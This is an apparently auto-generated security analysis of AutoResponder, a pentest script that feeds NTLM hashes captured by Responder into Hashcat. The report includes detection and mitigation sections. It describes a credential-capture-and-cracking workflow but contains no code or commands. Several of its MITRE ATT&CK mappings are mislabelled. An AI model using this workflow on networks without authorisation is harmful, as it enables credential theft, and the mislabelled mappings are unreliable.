Full Report
When doing internals, usually an easy first step is to use Responder and wait to retrieve NTLM hashes, cracking them and hoping for a weak password. The problem is that sometimes fancy cracking rigs might not be available, it might be a mess to copy/paste all those hashes, send them, wait for an answer where you could already do some work locally, without any effort. We’re all lazy, and I’m even more lazy. That’s why I decided doing this project.
Analysis Summary
# Tool/Technique: AutoResponder
## Overview
AutoResponder is a Python script designed to automate the process of capturing NTLM hashes via Responder, immediately sending these hashes to a local Hashcat instance for offline cracking, and displaying the results, thereby eliminating manual steps involved in copying/pasting hashes.
## Technical Details
- Type: Tool
- Platform: Linux (specifically mentioned to work out of the box on Kali Linux)
- Capabilities: Monitors Responder logs, extracts NTLMv1 and NTLMv2 hashes in real-time, and leverages Hashcat for immediate cracking against provided wordlists.
- First Seen: December 11, 2015
## MITRE ATT&CK Mapping
The primary technique relies on capturing credentials via network listening, which is then subjected to offline cracking.
- **TA0006 - Credential Access**
- T1003 - OS Credential Dumping
- T1003.001 - NT/SAM
- T1110 - Brute Force
- T1110.003 - Credential Cracking
- **TA0011 - Collection**
- T1005 - Data from Local System (via log reading)
## Functionality
### Core Capabilities
* **Hash Capture Monitoring:** Monitors the log directory generated by the Responder tool for newly captured NTLMv1 and NTLMv2 hashes.
* **Hash Loading:** Automatically loads captured hashes from Responder logs upon detection.
* **Local Cracking Execution:** Executes Hashcat locally using provided wordlists against the captured hashes.
* **Immediate Feedback:** Displays successfully cracked credentials (Username:Password) and the originating IP address directly to the console.
### Advanced Features
* **Integration:** Designed to run concurrently with Responder during internal network assessments.
* **Configuration Flexibility:** Allows users to specify paths for wordlists, the Responder logs directory, and the Hashcat binary (defaults to Kali standard paths if omitted).
## Indicators of Compromise
* File Hashes: N/A (Tool, not malware)
* File Names: `auto_responder.py`
* Registry Keys: N/A
* Network Indicators: N/A (This tool processes existing captured data/hashes, it does not initiate network connections unless Hashcat is configured to communicate externally, which is not the core function described.)
* Behavioral Indicators: Reading/monitoring files within the directory structure where Responder writes its captured logs (e.g., reading `.log` files). Execution of the `hashcat` binary following credential capture events.
## Associated Threat Actors
* No specific threat groups are mentioned; this is described as a utility for internal assessments and security researchers (lazy penetration testers).
## Detection Methods
* **Signature-based detection:** Detection of the hash file name (`auto_responder.py`) or the execution of the script from the cloned Git repository location.
* **Behavioral detection:** Monitoring processes for the execution of Python scripts that subsequently launch or heavily interact with the local `hashcat` binary, especially when coupled with file monitoring activities typical of network poisoning tools like Responder.
* **YARA rules:** N/A (Not applicable unless looking for the source code file).
## Mitigation Strategies
* **Prevention Measures:** Restrict the execution of unsigned or unapproved Python scripts on assessment or production systems.
* **Hardening Recommendations:** Implement strong password policies (mitigating the effectiveness of wordlist cracking); disable LLMNR and NBT-NS protocols or deploy mitigations like InQuest or using specialized firewall rules to limit broadcast traffic if possible in the network segment.
## Related Tools/Techniques
* **Responder:** The prerequisite tool whose output (NTLM hashes) AutoResponder consumes.
* **Hashcat:** The cracking utility executed by AutoResponder.
* **Autoresp:** The inspiration for this project written by Dan McInerney.